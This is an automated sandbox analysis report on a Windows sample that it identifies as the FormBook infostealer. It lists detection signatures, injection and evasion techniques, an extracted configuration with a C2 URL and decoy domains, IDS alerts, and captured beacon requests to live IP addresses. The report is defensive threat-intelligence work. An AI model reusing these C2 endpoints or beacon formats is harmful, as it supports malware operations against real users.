Windows Analysis Report
1.exe

Overview

General Information

Sample Name: 1.exe
Analysis ID: 1345564
MD5: 60ff6dcfe9ed4741b4ffb91cd3bd6895
SHA1: 89bec9456328957250b9ec8b30ec87495ab1a2e1
SHA256: 6d923f02c2252e4a2ea98a8685fc5237354e2853791855f1a451a390dd85cbb9
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Antivirus / Scanner detection for submitted sample
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
.NET source code references suspicious native API functions
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
.NET source code contains potential unpacker
.NET source code contains method to dynamically call methods (often used by packers)
Queues an APC in another process (thread injection)
.NET source code contains very large array initializations
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to resolve many domain names, but no domain seems valid
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection
barindex
Found malware configuration
Source: 00000000.00000002.2021713062.0000000003E79000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.switchtoambitwithmirtha.com/jskg/"], "decoy": ["jajaten.com", "pnorg.net", "rccarquibogota.com", "marcomarabiamea.com", "theligue.com", "mdearpet.com", "barokahsrivillage.com", "wisdomtoothguru.com", "srteamsex.com", "erotictoybox.com", "278698.com", "victimaccidents.com", "bootyfashions.com", "stomasto.site", "canalysisconsulting.com", "printandmail.legal", "bestcureforbackpain.com", "apanifitness.com", "smartabletech.com", "facialsteamerofficial.com", "cookclassesfishes.com", "ayanmobile.com", "cannapharmaus.com", "lactationdrink.com", "enrgsystems.info", "f1leghecodemasters.net", "topazkibblez.com", "appbecause.com", "256barrington.com", "snapmoneyexchangellc.com", "kriolland.com", "7255399.com", "realoneathletics.info", "illustriousevents.com", "moonman.services", "dog2meeting.com", "successwithyolandafgreen.com", "freshlookconsulting.net", "3bcreditwatch.com", "lacroixundkress.com", "beaujolaisboston.com", "breakawayfc.com", "bollmasonry.com", "jiujitsuspa.com", "zirangaobai.com", "capitalmedicalsupplies.net", "swavhca.com", "pereiranatalia.com", "lbarco.com", "revistabrasileiramarketing.info", "carportaccessory.com", "kvrkl.com", "handledlife.com", "groups-post-sales-2678493.xyz", "rapidprintz.com", "buzzkeel.com", "divinityemerald.com", "ppc-listing.info", "coryfireshop.com", "mimipopuppicnics.com", "votehealey.com", "saraadamchak.com", "winwinwin365.net", "tprmt.com"]}
Multi AV Scanner detection for submitted file
Source: 1.exe ReversingLabs: Detection: 92%
Source: 1.exe Virustotal: Detection: 82% Perma Link
Yara detected FormBook
Source: Yara match File source: 2.2.1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.1.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.1.exe.407d900.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.1.exe.3fbfe60.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.1.exe.4009280.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.4449219136.00000000030B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2045843901.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2021713062.0000000003E79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.4449610086.0000000004B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.4449093142.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Antivirus / Scanner detection for submitted sample
Source: 1.exe Avira: detected
Antivirus detection for URL or domain
Source: http://www.lactationdrink.com Avira URL Cloud: Label: malware
Source: http://www.ppc-listing.info/jskg/www.pnorg.net Avira URL Cloud: Label: malware
Source: http://www.ppc-listing.info/jskg/ Avira URL Cloud: Label: malware
Source: http://www.lactationdrink.com/jskg/?yV3lvHf=VpJkz2P0T+/fMnrM7Dd1ATiiN68XLLnGpPbE/bn1fGrx+Ecv7ydvnShawUNCssxxEBuD&8pbLu=d8z4X8O0M Avira URL Cloud: Label: malware
Source: http://www.ppc-listing.info Avira URL Cloud: Label: malware
Source: http://www.lactationdrink.com/jskg/www.wisdomtoothguru.com Avira URL Cloud: Label: malware
Source: http://www.lactationdrink.com/jskg/ Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: http://www.switchtoambitwithmirtha.com/jskg/ Virustotal: Detection: 6% Perma Link
Machine Learning detection for sample
Source: 1.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: 1.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 1.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: colorcpl.pdbGCTL source: 1.exe, 00000002.00000002.2046399747.0000000001520000.00000040.10000000.00040000.00000000.sdmp, 1.exe, 00000002.00000002.2046273682.0000000001297000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000004.00000002.4449033353.0000000000E00000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: colorcpl.pdb source: 1.exe, 00000002.00000002.2046399747.0000000001520000.00000040.10000000.00040000.00000000.sdmp, 1.exe, 00000002.00000002.2046273682.0000000001297000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000004.00000002.4449033353.0000000000E00000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: 1.exe, 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000004.00000003.2047949861.0000000004C70000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000004.00000002.4449812792.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000004.00000003.2045475462.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000004.00000002.4449812792.0000000004FBE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: 1.exe, 1.exe, 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, colorcpl.exe, 00000004.00000003.2047949861.0000000004C70000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000004.00000002.4449812792.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000004.00000003.2045475462.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000004.00000002.4449812792.0000000004FBE000.00000040.00001000.00020000.00000000.sdmp
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\1.exe Code function: 4x nop then pop edi 2_2_004155FB
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4x nop then pop edi 4_2_02E355FB

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 23.227.38.74 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 167.172.69.40 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 217.160.0.167 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 34.149.87.45 80 Jump to behavior
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49712 -> 167.172.69.40:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49713 -> 34.149.87.45:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49715 -> 217.160.0.167:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49716 -> 23.227.38.74:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49718 -> 23.227.38.74:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49719 -> 167.172.69.40:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49720 -> 34.149.87.45:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49721 -> 217.160.0.167:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49722 -> 23.227.38.74:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49723 -> 23.227.38.74:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49724 -> 167.172.69.40:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49725 -> 34.149.87.45:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49726 -> 217.160.0.167:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.switchtoambitwithmirtha.com/jskg/
Tries to resolve many domain names, but no domain seems valid
Source: unknown DNS traffic detected: query: www.revistabrasileiramarketing.info replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.dog2meeting.com replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.successwithyolandafgreen.com replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.topazkibblez.com replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.bootyfashions.com replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.kvrkl.com replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.switchtoambitwithmirtha.com replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.wisdomtoothguru.com replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.coryfireshop.com replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: www.pnorg.net replaycode: Name error (3)
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /jskg/?yV3lvHf=VpJkz2P0T+/fMnrM7Dd1ATiiN68XLLnGpPbE/bn1fGrx+Ecv7ydvnShawUNCssxxEBuD&8pbLu=d8z4X8O0M HTTP/1.1Host: www.lactationdrink.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /jskg/?yV3lvHf=sl42yIbVTE2EkcOIsEKOUlHCBbE7QxdA6NZ7PagwYH4YR2l/R8Pf4e2TsXHmMhsmvqG9&8pbLu=d8z4X8O0M HTTP/1.1Host: www.lbarco.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /jskg/?yV3lvHf=rveZUXr0eiAxnxziI1jk8UfOJjaXPdODc7FyD8YkXp0tAnYlEmHCL6gZaE21r0Zq0hTH&8pbLu=d8z4X8O0M HTTP/1.1Host: www.lacroixundkress.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /jskg/?yV3lvHf=D3ZsiJPHujYqAAcPubxypI16Ov1mNCduO0wq0OOwpknW2PP1SKlK/fdwCNTvhBS54Rsq&8pbLu=d8z4X8O0M HTTP/1.1Host: www.saraadamchak.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /jskg/?yV3lvHf=YCW0/yd7C01aElrhcPhS/kt9m722krufJvCDJvN/MprEBXvxMY86CRBbv2aG0eSAUYQv&8pbLu=d8z4X8O0M HTTP/1.1Host: www.erotictoybox.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /jskg/?yV3lvHf=VpJkz2P0T+/fMnrM7Dd1ATiiN68XLLnGpPbE/bn1fGrx+Ecv7ydvnShawUNCssxxEBuD&8pbLu=d8z4X8O0M HTTP/1.1Host: www.lactationdrink.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /jskg/?yV3lvHf=sl42yIbVTE2EkcOIsEKOUlHCBbE7QxdA6NZ7PagwYH4YR2l/R8Pf4e2TsXHmMhsmvqG9&8pbLu=d8z4X8O0M HTTP/1.1Host: www.lbarco.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /jskg/?yV3lvHf=rveZUXr0eiAxnxziI1jk8UfOJjaXPdODc7FyD8YkXp0tAnYlEmHCL6gZaE21r0Zq0hTH&8pbLu=d8z4X8O0M HTTP/1.1Host: www.lacroixundkress.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /jskg/?yV3lvHf=D3ZsiJPHujYqAAcPubxypI16Ov1mNCduO0wq0OOwpknW2PP1SKlK/fdwCNTvhBS54Rsq&8pbLu=d8z4X8O0M HTTP/1.1Host: www.saraadamchak.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /jskg/?yV3lvHf=YCW0/yd7C01aElrhcPhS/kt9m722krufJvCDJvN/MprEBXvxMY86CRBbv2aG0eSAUYQv&8pbLu=d8z4X8O0M HTTP/1.1Host: www.erotictoybox.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /jskg/?yV3lvHf=VpJkz2P0T+/fMnrM7Dd1ATiiN68XLLnGpPbE/bn1fGrx+Ecv7ydvnShawUNCssxxEBuD&8pbLu=d8z4X8O0M HTTP/1.1Host: www.lactationdrink.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /jskg/?yV3lvHf=sl42yIbVTE2EkcOIsEKOUlHCBbE7QxdA6NZ7PagwYH4YR2l/R8Pf4e2TsXHmMhsmvqG9&8pbLu=d8z4X8O0M HTTP/1.1Host: www.lbarco.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /jskg/?yV3lvHf=rveZUXr0eiAxnxziI1jk8UfOJjaXPdODc7FyD8YkXp0tAnYlEmHCL6gZaE21r0Zq0hTH&8pbLu=d8z4X8O0M HTTP/1.1Host: www.lacroixundkress.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 23.227.38.74 23.227.38.74
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/htmlcache-control: private, no-cache, max-age=0pragma: no-cachecontent-length: 1236date: Tue, 21 Nov 2023 02:30:32 GMTserver: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 21 Nov 2023 02:31:19 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4515Connection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Tue, 21 Nov 2023 02:31:34 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OJeXESvsWpjrZzOUy1Rc7a2iN2AFTLD1eAvr87EhZY1qyoaUL8DeQgfYbS2%2F45fy%2FfR%2BJLMCGgPSAnC3CtsgIz9PDF%2Fv2Svcr5EszY8hHtQRDAuw9OAnVY%2FE%2Bd75ZhOXA2OohC%2FI"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=34.999847Server: cloudflareCF-RAY: 82958409eace2012-IADalt-svc: h3=":443"; ma=86400Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 Data Ascii: <!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 21 Nov 2023 02:31:50 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4515Connection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Tue, 21 Nov 2023 02:32:05 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=omfUeHiTJDD66dyoVCutoz78sBmapGqz6PKgBdHu9APnwo3knvupiE7ld9pTsOUedJlsNBBhoOTOMWVza6nc%2BSxHBsSlUuBzL1uvM64LV6s3C2EW61SgSFxubYt7rgze46OTtmZE"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=6.999969Server: cloudflareCF-RAY: 829584cbb99b0658-IADalt-svc: h3=":443"; ma=86400Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f Data Ascii: <!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofo
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/htmlcache-control: private, no-cache, max-age=0pragma: no-cachecontent-length: 1236date: Tue, 21 Nov 2023 02:32:02 GMTserver: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 